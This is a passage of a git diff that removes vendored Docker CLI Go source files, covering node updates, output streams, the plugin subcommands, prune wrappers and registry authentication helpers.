continue - } - return err - } - err = client.NodeUpdate(ctx, node.ID, node.Version, node.Spec) - if err != nil { - return err - } - success(nodeID) - } - return nil -} - -func mergeNodeUpdate(flags *pflag.FlagSet) func(*swarm.Node) error { - return func(node *swarm.Node) error { - spec := &node.Spec - - if flags.Changed(flagRole) { - str, err := flags.GetString(flagRole) - if err != nil { - return err - } - spec.Role = swarm.NodeRole(str) - } - if flags.Changed(flagAvailability) { - str, err := flags.GetString(flagAvailability) - if err != nil { - return err - } - spec.Availability = swarm.NodeAvailability(str) - } - if spec.Annotations.Labels == nil { - spec.Annotations.Labels = make(map[string]string) - } - if flags.Changed(flagLabelAdd) { - labels := flags.Lookup(flagLabelAdd).Value.(*opts.ListOpts).GetAll() - for k, v := range runconfigopts.ConvertKVStringsToMap(labels) { - spec.Annotations.Labels[k] = v - } - } - if flags.Changed(flagLabelRemove) { - keys := flags.Lookup(flagLabelRemove).Value.(*opts.ListOpts).GetAll() - for _, k := range keys { - // if a key doesn't exist, fail the command explicitly - if _, exists := spec.Annotations.Labels[k]; !exists { - return fmt.Errorf("key %s doesn't exist in node's labels", k) - } - delete(spec.Annotations.Labels, k) - } - } - return nil - } -} - -const ( - flagRole = "role" - flagAvailability = "availability" - flagLabelAdd = "label-add" - flagLabelRemove = "label-rm" -) diff --git a/vendor/github.com/docker/docker/cli/command/out.go b/vendor/github.com/docker/docker/cli/command/out.go deleted file mode 100644 index 85718d7acd..0000000000 --- a/vendor/github.com/docker/docker/cli/command/out.go +++ /dev/null @@ -1,69 +0,0 @@ -package command - -import ( - "io" - "os" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/pkg/term" -) - -// OutStream is an output stream used by the DockerCli to write normal program -// output. 
-type OutStream struct { - out io.Writer - fd uintptr - isTerminal bool - state *term.State -} - -func (o *OutStream) Write(p []byte) (int, error) { - return o.out.Write(p) -} - -// FD returns the file descriptor number for this stream -func (o *OutStream) FD() uintptr { - return o.fd -} - -// IsTerminal returns true if this stream is connected to a terminal -func (o *OutStream) IsTerminal() bool { - return o.isTerminal -} - -// SetRawTerminal sets raw mode on the output terminal -func (o *OutStream) SetRawTerminal() (err error) { - if os.Getenv("NORAW") != "" || !o.isTerminal { - return nil - } - o.state, err = term.SetRawTerminalOutput(o.fd) - return err -} - -// RestoreTerminal restores normal mode to the terminal -func (o *OutStream) RestoreTerminal() { - if o.state != nil { - term.RestoreTerminal(o.fd, o.state) - } -} - -// GetTtySize returns the height and width in characters of the tty -func (o *OutStream) GetTtySize() (uint, uint) { - if !o.isTerminal { - return 0, 0 - } - ws, err := term.GetWinsize(o.fd) - if err != nil { - logrus.Debugf("Error getting size: %s", err) - if ws == nil { - return 0, 0 - } - } - return uint(ws.Height), uint(ws.Width) -} - -// NewOutStream returns a new OutStream object from a Writer -func NewOutStream(out io.Writer) *OutStream { - fd, isTerminal := term.GetFdInfo(out) - return &OutStream{out: out, fd: fd, isTerminal: isTerminal} -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/cmd.go b/vendor/github.com/docker/docker/cli/command/plugin/cmd.go deleted file mode 100644 index 92c990a975..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/cmd.go +++ /dev/null @@ -1,31 +0,0 @@ -package plugin - -import ( - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -// NewPluginCommand returns a cobra command for `plugin` subcommands -func NewPluginCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "plugin", - Short: 
"Manage plugins", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - - cmd.AddCommand( - newDisableCommand(dockerCli), - newEnableCommand(dockerCli), - newInspectCommand(dockerCli), - newInstallCommand(dockerCli), - newListCommand(dockerCli), - newRemoveCommand(dockerCli), - newSetCommand(dockerCli), - newPushCommand(dockerCli), - newCreateCommand(dockerCli), - newUpgradeCommand(dockerCli), - ) - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/create.go b/vendor/github.com/docker/docker/cli/command/plugin/create.go deleted file mode 100644 index 2aab1e9e4a..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/create.go +++ /dev/null @@ -1,125 +0,0 @@ -package plugin - -import ( - "encoding/json" - "fmt" - "io" - "os" - "path/filepath" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/reference" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -// validateTag checks if the given repoName can be resolved. -func validateTag(rawRepo string) error { - _, err := reference.ParseNamed(rawRepo) - - return err -} - -// validateConfig ensures that a valid config.json is available in the given path -func validateConfig(path string) error { - dt, err := os.Open(filepath.Join(path, "config.json")) - if err != nil { - return err - } - - m := types.PluginConfig{} - err = json.NewDecoder(dt).Decode(&m) - dt.Close() - - return err -} - -// validateContextDir validates the given dir and returns abs path on success. 
-func validateContextDir(contextDir string) (string, error) { - absContextDir, err := filepath.Abs(contextDir) - - stat, err := os.Lstat(absContextDir) - if err != nil { - return "", err - } - - if !stat.IsDir() { - return "", fmt.Errorf("context must be a directory") - } - - return absContextDir, nil -} - -type pluginCreateOptions struct { - repoName string - context string - compress bool -} - -func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { - options := pluginCreateOptions{} - - cmd := &cobra.Command{ - Use: "create [OPTIONS] PLUGIN PLUGIN-DATA-DIR", - Short: "Create a plugin from a rootfs and configuration. Plugin data directory must contain config.json and rootfs directory.", - Args: cli.RequiresMinArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - options.repoName = args[0] - options.context = args[1] - return runCreate(dockerCli, options) - }, - } - - flags := cmd.Flags() - - flags.BoolVar(&options.compress, "compress", false, "Compress the context using gzip") - - return cmd -} - -func runCreate(dockerCli *command.DockerCli, options pluginCreateOptions) error { - var ( - createCtx io.ReadCloser - err error - ) - - if err := validateTag(options.repoName); err != nil { - return err - } - - absContextDir, err := validateContextDir(options.context) - if err != nil { - return err - } - - if err := validateConfig(options.context); err != nil { - return err - } - - compression := archive.Uncompressed - if options.compress { - logrus.Debugf("compression enabled") - compression = archive.Gzip - } - - createCtx, err = archive.TarWithOptions(absContextDir, &archive.TarOptions{ - Compression: compression, - }) - - if err != nil { - return err - } - - ctx := context.Background() - - createOptions := types.PluginCreateOptions{RepoName: options.repoName} - if err = dockerCli.Client().PluginCreate(ctx, createCtx, createOptions); err != nil { - return err - } - fmt.Fprintln(dockerCli.Out(), options.repoName) - return nil -} diff --git 
a/vendor/github.com/docker/docker/cli/command/plugin/disable.go b/vendor/github.com/docker/docker/cli/command/plugin/disable.go deleted file mode 100644 index 07b0ec2288..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/disable.go +++ /dev/null @@ -1,36 +0,0 @@ -package plugin - -import ( - "fmt" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -func newDisableCommand(dockerCli *command.DockerCli) *cobra.Command { - var force bool - - cmd := &cobra.Command{ - Use: "disable [OPTIONS] PLUGIN", - Short: "Disable a plugin", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runDisable(dockerCli, args[0], force) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&force, "force", "f", false, "Force the disable of an active plugin") - return cmd -} - -func runDisable(dockerCli *command.DockerCli, name string, force bool) error { - if err := dockerCli.Client().PluginDisable(context.Background(), name, types.PluginDisableOptions{Force: force}); err != nil { - return err - } - fmt.Fprintln(dockerCli.Out(), name) - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/enable.go b/vendor/github.com/docker/docker/cli/command/plugin/enable.go deleted file mode 100644 index 77762f4024..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/enable.go +++ /dev/null @@ -1,47 +0,0 @@ -package plugin - -import ( - "fmt" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type enableOpts struct { - timeout int - name string -} - -func newEnableCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts enableOpts - - cmd := &cobra.Command{ - Use: "enable [OPTIONS] PLUGIN", - Short: "Enable a plugin", - Args: cli.ExactArgs(1), - RunE: 
func(cmd *cobra.Command, args []string) error { - opts.name = args[0] - return runEnable(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.IntVar(&opts.timeout, "timeout", 0, "HTTP client timeout (in seconds)") - return cmd -} - -func runEnable(dockerCli *command.DockerCli, opts *enableOpts) error { - name := opts.name - if opts.timeout < 0 { - return fmt.Errorf("negative timeout %d is invalid", opts.timeout) - } - - if err := dockerCli.Client().PluginEnable(context.Background(), name, types.PluginEnableOptions{Timeout: opts.timeout}); err != nil { - return err - } - fmt.Fprintln(dockerCli.Out(), name) - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/inspect.go b/vendor/github.com/docker/docker/cli/command/plugin/inspect.go deleted file mode 100644 index c2c7a0d6bc..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/inspect.go +++ /dev/null @@ -1,42 +0,0 @@ -package plugin - -import ( - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/inspect" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type inspectOptions struct { - pluginNames []string - format string -} - -func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts inspectOptions - - cmd := &cobra.Command{ - Use: "inspect [OPTIONS] PLUGIN [PLUGIN...]", - Short: "Display detailed information on one or more plugins", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.pluginNames = args - return runInspect(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - return cmd -} - -func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { - client := dockerCli.Client() - ctx := context.Background() - getRef := func(ref string) (interface{}, []byte, error) { - return client.PluginInspectWithRaw(ctx, ref) - 
} - - return inspect.Inspect(dockerCli.Out(), opts.pluginNames, opts.format, getRef) -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/install.go b/vendor/github.com/docker/docker/cli/command/plugin/install.go deleted file mode 100644 index 2c3170c54a..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/install.go +++ /dev/null @@ -1,208 +0,0 @@ -package plugin - -import ( - "bufio" - "errors" - "fmt" - "strings" - - distreference "github.com/docker/distribution/reference" - "github.com/docker/docker/api/types" - registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/image" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/docker/docker/reference" - "github.com/docker/docker/registry" - "github.com/spf13/cobra" - "github.com/spf13/pflag" - "golang.org/x/net/context" -) - -type pluginOptions struct { - remote string - localName string - grantPerms bool - disable bool - args []string - skipRemoteCheck bool -} - -func loadPullFlags(opts *pluginOptions, flags *pflag.FlagSet) { - flags.BoolVar(&opts.grantPerms, "grant-all-permissions", false, "Grant all permissions necessary to run the plugin") - command.AddTrustedFlags(flags, true) -} - -func newInstallCommand(dockerCli *command.DockerCli) *cobra.Command { - var options pluginOptions - cmd := &cobra.Command{ - Use: "install [OPTIONS] PLUGIN [KEY=VALUE...]", - Short: "Install a plugin", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - options.remote = args[0] - if len(args) > 1 { - options.args = args[1:] - } - return runInstall(dockerCli, options) - }, - } - - flags := cmd.Flags() - loadPullFlags(&options, flags) - flags.BoolVar(&options.disable, "disable", false, "Do not enable the plugin on install") - flags.StringVar(&options.localName, "alias", "", "Local name for plugin") - return cmd -} - -func 
getRepoIndexFromUnnormalizedRef(ref distreference.Named) (*registrytypes.IndexInfo, error) { - named, err := reference.ParseNamed(ref.Name()) - if err != nil { - return nil, err - } - - repoInfo, err := registry.ParseRepositoryInfo(named) - if err != nil { - return nil, err - } - - return repoInfo.Index, nil -} - -type pluginRegistryService struct { - registry.Service -} - -func (s pluginRegistryService) ResolveRepository(name reference.Named) (repoInfo *registry.RepositoryInfo, err error) { - repoInfo, err = s.Service.ResolveRepository(name) - if repoInfo != nil { - repoInfo.Class = "plugin" - } - return -} - -func newRegistryService() registry.Service { - return pluginRegistryService{ - Service: registry.NewService(registry.ServiceOptions{V2Only: true}), - } -} - -func buildPullConfig(ctx context.Context, dockerCli *command.DockerCli, opts pluginOptions, cmdName string) (types.PluginInstallOptions, error) { - // Parse name using distribution reference package to support name - // containing both tag and digest. Names with both tag and digest - // will be treated by the daemon as a pull by digest with - // an alias for the tag (if no alias is provided). 
- ref, err := distreference.ParseNamed(opts.remote) - if err != nil { - return types.PluginInstallOptions{}, err - } - - index, err := getRepoIndexFromUnnormalizedRef(ref) - if err != nil { - return types.PluginInstallOptions{}, err - } - - repoInfoIndex, err := getRepoIndexFromUnnormalizedRef(ref) - if err != nil { - return types.PluginInstallOptions{}, err - } - remote := ref.String() - - _, isCanonical := ref.(distreference.Canonical) - if command.IsTrusted() && !isCanonical { - var nt reference.NamedTagged - named, err := reference.ParseNamed(ref.Name()) - if err != nil { - return types.PluginInstallOptions{}, err - } - if tagged, ok := ref.(distreference.Tagged); ok { - nt, err = reference.WithTag(named, tagged.Tag()) - if err != nil { - return types.PluginInstallOptions{}, err - } - } else { - named = reference.WithDefaultTag(named) - nt = named.(reference.NamedTagged) - } - - ctx := context.Background() - trusted, err := image.TrustedReference(ctx, dockerCli, nt, newRegistryService()) - if err != nil { - return types.PluginInstallOptions{}, err - } - remote = trusted.String() - } - - authConfig := command.ResolveAuthConfig(ctx, dockerCli, index) - - encodedAuth, err := command.EncodeAuthToBase64(authConfig) - if err != nil { - return types.PluginInstallOptions{}, err - } - - registryAuthFunc := command.RegistryAuthenticationPrivilegedFunc(dockerCli, repoInfoIndex, cmdName) - - options := types.PluginInstallOptions{ - RegistryAuth: encodedAuth, - RemoteRef: remote, - Disabled: opts.disable, - AcceptAllPermissions: opts.grantPerms, - AcceptPermissionsFunc: acceptPrivileges(dockerCli, opts.remote), - // TODO: Rename PrivilegeFunc, it has nothing to do with privileges - PrivilegeFunc: registryAuthFunc, - Args: opts.args, - } - return options, nil -} - -func runInstall(dockerCli *command.DockerCli, opts pluginOptions) error { - var localName string - if opts.localName != "" { - aref, err := reference.ParseNamed(opts.localName) - if err != nil { - return err - } - 
aref = reference.WithDefaultTag(aref) - if _, ok := aref.(reference.NamedTagged); !ok { - return fmt.Errorf("invalid name: %s", opts.localName) - } - localName = aref.String() - } - - ctx := context.Background() - options, err := buildPullConfig(ctx, dockerCli, opts, "plugin install") - if err != nil { - return err - } - responseBody, err := dockerCli.Client().PluginInstall(ctx, localName, options) - if err != nil { - if strings.Contains(err.Error(), "target is image") { - return errors.New(err.Error() + " - Use `docker image pull`") - } - return err - } - defer responseBody.Close() - if err := jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil); err != nil { - return err - } - fmt.Fprintf(dockerCli.Out(), "Installed plugin %s\n", opts.remote) // todo: return proper values from the API for this result - return nil -} - -func acceptPrivileges(dockerCli *command.DockerCli, name string) func(privileges types.PluginPrivileges) (bool, error) { - return func(privileges types.PluginPrivileges) (bool, error) { - fmt.Fprintf(dockerCli.Out(), "Plugin %q is requesting the following privileges:\n", name) - for _, privilege := range privileges { - fmt.Fprintf(dockerCli.Out(), " - %s: %v\n", privilege.Name, privilege.Value) - } - - fmt.Fprint(dockerCli.Out(), "Do you grant the above permissions? 
[y/N] ") - reader := bufio.NewReader(dockerCli.In()) - line, _, err := reader.ReadLine() - if err != nil { - return false, err - } - return strings.ToLower(string(line)) == "y", nil - } -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/list.go b/vendor/github.com/docker/docker/cli/command/plugin/list.go deleted file mode 100644 index 8fd16dae3f..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/list.go +++ /dev/null @@ -1,63 +0,0 @@ -package plugin - -import ( - "fmt" - "strings" - "text/tabwriter" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/stringutils" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type listOptions struct { - noTrunc bool -} - -func newListCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts listOptions - - cmd := &cobra.Command{ - Use: "ls [OPTIONS]", - Short: "List plugins", - Aliases: []string{"list"}, - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runList(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") - - return cmd -} - -func runList(dockerCli *command.DockerCli, opts listOptions) error { - plugins, err := dockerCli.Client().PluginList(context.Background()) - if err != nil { - return err - } - - w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0) - fmt.Fprintf(w, "ID \tNAME \tDESCRIPTION\tENABLED") - fmt.Fprintf(w, "\n") - - for _, p := range plugins { - id := p.ID - desc := strings.Replace(p.Config.Description, "\n", " ", -1) - desc = strings.Replace(desc, "\r", " ", -1) - if !opts.noTrunc { - id = stringid.TruncateID(p.ID) - desc = stringutils.Ellipsis(desc, 45) - } - - fmt.Fprintf(w, "%s\t%s\t%s\t%v\n", id, p.Name, desc, p.Enabled) - } - w.Flush() - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/push.go 
b/vendor/github.com/docker/docker/cli/command/plugin/push.go deleted file mode 100644 index 9abb38ec0b..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/push.go +++ /dev/null @@ -1,71 +0,0 @@ -package plugin - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/image" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/docker/docker/reference" - "github.com/docker/docker/registry" - "github.com/spf13/cobra" -) - -func newPushCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "push [OPTIONS] PLUGIN[:TAG]", - Short: "Push a plugin to a registry", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runPush(dockerCli, args[0]) - }, - } - - flags := cmd.Flags() - - command.AddTrustedFlags(flags, true) - - return cmd -} - -func runPush(dockerCli *command.DockerCli, name string) error { - named, err := reference.ParseNamed(name) // FIXME: validate - if err != nil { - return err - } - if reference.IsNameOnly(named) { - named = reference.WithDefaultTag(named) - } - ref, ok := named.(reference.NamedTagged) - if !ok { - return fmt.Errorf("invalid name: %s", named.String()) - } - - ctx := context.Background() - - repoInfo, err := registry.ParseRepositoryInfo(named) - if err != nil { - return err - } - authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index) - - encodedAuth, err := command.EncodeAuthToBase64(authConfig) - if err != nil { - return err - } - responseBody, err := dockerCli.Client().PluginPush(ctx, ref.String(), encodedAuth) - if err != nil { - return err - } - defer responseBody.Close() - - if command.IsTrusted() { - repoInfo.Class = "plugin" - return image.PushTrustedReference(dockerCli, repoInfo, named, authConfig, responseBody) - } - - return jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil) -} diff --git 
a/vendor/github.com/docker/docker/cli/command/plugin/remove.go b/vendor/github.com/docker/docker/cli/command/plugin/remove.go deleted file mode 100644 index 9f3aba9a01..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/remove.go +++ /dev/null @@ -1,55 +0,0 @@ -package plugin - -import ( - "fmt" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type rmOptions struct { - force bool - - plugins []string -} - -func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts rmOptions - - cmd := &cobra.Command{ - Use: "rm [OPTIONS] PLUGIN [PLUGIN...]", - Short: "Remove one or more plugins", - Aliases: []string{"remove"}, - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.plugins = args - return runRemove(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Force the removal of an active plugin") - return cmd -} - -func runRemove(dockerCli *command.DockerCli, opts *rmOptions) error { - ctx := context.Background() - - var errs cli.Errors - for _, name := range opts.plugins { - // TODO: pass names to api instead of making multiple api calls - if err := dockerCli.Client().PluginRemove(ctx, name, types.PluginRemoveOptions{Force: opts.force}); err != nil { - errs = append(errs, err) - continue - } - fmt.Fprintln(dockerCli.Out(), name) - } - // Do not simplify to `return errs` because even if errs == nil, it is not a nil-error interface value. 
- if errs != nil { - return errs - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/set.go b/vendor/github.com/docker/docker/cli/command/plugin/set.go deleted file mode 100644 index 52b09fb500..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/set.go +++ /dev/null @@ -1,22 +0,0 @@ -package plugin - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -func newSetCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "set PLUGIN KEY=VALUE [KEY=VALUE...]", - Short: "Change settings for a plugin", - Args: cli.RequiresMinArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - return dockerCli.Client().PluginSet(context.Background(), args[0], args[1:]) - }, - } - - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/upgrade.go b/vendor/github.com/docker/docker/cli/command/plugin/upgrade.go deleted file mode 100644 index d212cd7e52..0000000000 --- a/vendor/github.com/docker/docker/cli/command/plugin/upgrade.go +++ /dev/null @@ -1,100 +0,0 @@ -package plugin - -import ( - "bufio" - "context" - "fmt" - "strings" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/docker/docker/reference" - "github.com/pkg/errors" - "github.com/spf13/cobra" -) - -func newUpgradeCommand(dockerCli *command.DockerCli) *cobra.Command { - var options pluginOptions - cmd := &cobra.Command{ - Use: "upgrade [OPTIONS] PLUGIN [REMOTE]", - Short: "Upgrade an existing plugin", - Args: cli.RequiresRangeArgs(1, 2), - RunE: func(cmd *cobra.Command, args []string) error { - options.localName = args[0] - if len(args) == 2 { - options.remote = args[1] - } - return runUpgrade(dockerCli, options) - }, - } - - flags := cmd.Flags() - loadPullFlags(&options, flags) - flags.BoolVar(&options.skipRemoteCheck, 
"skip-remote-check", false, "Do not check if specified remote plugin matches existing plugin image") - return cmd -} - -func runUpgrade(dockerCli *command.DockerCli, opts pluginOptions) error { - ctx := context.Background() - p, _, err := dockerCli.Client().PluginInspectWithRaw(ctx, opts.localName) - if err != nil { - return fmt.Errorf("error reading plugin data: %v", err) - } - - if p.Enabled { - return fmt.Errorf("the plugin must be disabled before upgrading") - } - - opts.localName = p.Name - if opts.remote == "" { - opts.remote = p.PluginReference - } - remote, err := reference.ParseNamed(opts.remote) - if err != nil { - return errors.Wrap(err, "error parsing remote upgrade image reference") - } - remote = reference.WithDefaultTag(remote) - - old, err := reference.ParseNamed(p.PluginReference) - if err != nil { - return errors.Wrap(err, "error parsing current image reference") - } - old = reference.WithDefaultTag(old) - - fmt.Fprintf(dockerCli.Out(), "Upgrading plugin %s from %s to %s\n", p.Name, old, remote) - if !opts.skipRemoteCheck && remote.String() != old.String() { - _, err := fmt.Fprint(dockerCli.Out(), "Plugin images do not match, are you sure? 
") - if err != nil { - return errors.Wrap(err, "error writing to stdout") - } - - rdr := bufio.NewReader(dockerCli.In()) - line, _, err := rdr.ReadLine() - if err != nil { - return errors.Wrap(err, "error reading from stdin") - } - if strings.ToLower(string(line)) != "y" { - return errors.New("canceling upgrade request") - } - } - - options, err := buildPullConfig(ctx, dockerCli, opts, "plugin upgrade") - if err != nil { - return err - } - - responseBody, err := dockerCli.Client().PluginUpgrade(ctx, opts.localName, options) - if err != nil { - if strings.Contains(err.Error(), "target is image") { - return errors.New(err.Error() + " - Use `docker image pull`") - } - return err - } - defer responseBody.Close() - if err := jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil); err != nil { - return err - } - fmt.Fprintf(dockerCli.Out(), "Upgraded plugin %s to %s\n", opts.localName, opts.remote) // todo: return proper values from the API for this result - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/prune/prune.go b/vendor/github.com/docker/docker/cli/command/prune/prune.go deleted file mode 100644 index a022487fd6..0000000000 --- a/vendor/github.com/docker/docker/cli/command/prune/prune.go +++ /dev/null @@ -1,50 +0,0 @@ -package prune - -import ( - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/container" - "github.com/docker/docker/cli/command/image" - "github.com/docker/docker/cli/command/network" - "github.com/docker/docker/cli/command/volume" - "github.com/spf13/cobra" -) - -// NewContainerPruneCommand returns a cobra prune command for containers -func NewContainerPruneCommand(dockerCli *command.DockerCli) *cobra.Command { - return container.NewPruneCommand(dockerCli) -} - -// NewVolumePruneCommand returns a cobra prune command for volumes -func NewVolumePruneCommand(dockerCli *command.DockerCli) *cobra.Command { - return volume.NewPruneCommand(dockerCli) -} - -// NewImagePruneCommand 
returns a cobra prune command for images -func NewImagePruneCommand(dockerCli *command.DockerCli) *cobra.Command { - return image.NewPruneCommand(dockerCli) -} - -// NewNetworkPruneCommand returns a cobra prune command for Networks -func NewNetworkPruneCommand(dockerCli *command.DockerCli) *cobra.Command { - return network.NewPruneCommand(dockerCli) -} - -// RunContainerPrune executes a prune command for containers -func RunContainerPrune(dockerCli *command.DockerCli) (uint64, string, error) { - return container.RunPrune(dockerCli) -} - -// RunVolumePrune executes a prune command for volumes -func RunVolumePrune(dockerCli *command.DockerCli) (uint64, string, error) { - return volume.RunPrune(dockerCli) -} - -// RunImagePrune executes a prune command for images -func RunImagePrune(dockerCli *command.DockerCli, all bool) (uint64, string, error) { - return image.RunPrune(dockerCli, all) -} - -// RunNetworkPrune executes a prune command for networks -func RunNetworkPrune(dockerCli *command.DockerCli) (uint64, string, error) { - return network.RunPrune(dockerCli) -} diff --git a/vendor/github.com/docker/docker/cli/command/registry.go b/vendor/github.com/docker/docker/cli/command/registry.go deleted file mode 100644 index 65f6b3309e..0000000000 --- a/vendor/github.com/docker/docker/cli/command/registry.go +++ /dev/null @@ -1,186 +0,0 @@ -package command - -import ( - "bufio" - "encoding/base64" - "encoding/json" - "fmt" - "io" - "os" - "runtime" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/pkg/term" - "github.com/docker/docker/reference" - "github.com/docker/docker/registry" -) - -// ElectAuthServer returns the default registry to use (by asking the daemon) -func ElectAuthServer(ctx context.Context, cli *DockerCli) string { - // The daemon `/info` endpoint informs us of the default registry being - // used. 
This is essential in cross-platforms environment, where for - // example a Linux client might be interacting with a Windows daemon, hence - // the default registry URL might be Windows specific. - serverAddress := registry.IndexServer - if info, err := cli.Client().Info(ctx); err != nil { - fmt.Fprintf(cli.Out(), "Warning: failed to get default registry endpoint from daemon (%v). Using system default: %s\n", err, serverAddress) - } else { - serverAddress = info.IndexServerAddress - } - return serverAddress -} - -// EncodeAuthToBase64 serializes the auth configuration as JSON base64 payload -func EncodeAuthToBase64(authConfig types.AuthConfig) (string, error) { - buf, err := json.Marshal(authConfig) - if err != nil { - return "", err - } - return base64.URLEncoding.EncodeToString(buf), nil -} - -// RegistryAuthenticationPrivilegedFunc returns a RequestPrivilegeFunc from the specified registry index info -// for the given command. -func RegistryAuthenticationPrivilegedFunc(cli *DockerCli, index *registrytypes.IndexInfo, cmdName string) types.RequestPrivilegeFunc { - return func() (string, error) { - fmt.Fprintf(cli.Out(), "\nPlease login prior to %s:\n", cmdName) - indexServer := registry.GetAuthConfigKey(index) - isDefaultRegistry := indexServer == ElectAuthServer(context.Background(), cli) - authConfig, err := ConfigureAuth(cli, "", "", indexServer, isDefaultRegistry) - if err != nil { - return "", err - } - return EncodeAuthToBase64(authConfig) - } -} - -// ResolveAuthConfig is like registry.ResolveAuthConfig, but if using the -// default index, it uses the default index name for the daemon's platform, -// not the client's platform. 
-func ResolveAuthConfig(ctx context.Context, cli *DockerCli, index *registrytypes.IndexInfo) types.AuthConfig { - configKey := index.Name - if index.Official { - configKey = ElectAuthServer(ctx, cli) - } - - a, _ := cli.CredentialsStore(configKey).Get(configKey) - return a -} - -// ConfigureAuth returns an AuthConfig from the specified user, password and server. -func ConfigureAuth(cli *DockerCli, flUser, flPassword, serverAddress string, isDefaultRegistry bool) (types.AuthConfig, error) { - // On Windows, force the use of the regular OS stdin stream. Fixes #14336/#14210 - if runtime.GOOS == "windows" { - cli.in = NewInStream(os.Stdin) - } - - if !isDefaultRegistry { - serverAddress = registry.ConvertToHostname(serverAddress) - } - - authconfig, err := cli.CredentialsStore(serverAddress).Get(serverAddress) - if err != nil { - return authconfig, err - } - - // Some links documenting this: - // - https://code.google.com/archive/p/mintty/issues/56 - // - https://github.com/docker/docker/issues/15272 - // - https://mintty.github.io/ (compatibility) - // Linux will hit this if you attempt `cat | docker login`, and Windows - // will hit this if you attempt docker login from mintty where stdin - // is a pipe, not a character based console. - if flPassword == "" && !cli.In().IsTerminal() { - return authconfig, fmt.Errorf("Error: Cannot perform an interactive login from a non TTY device") - } - - authconfig.Username = 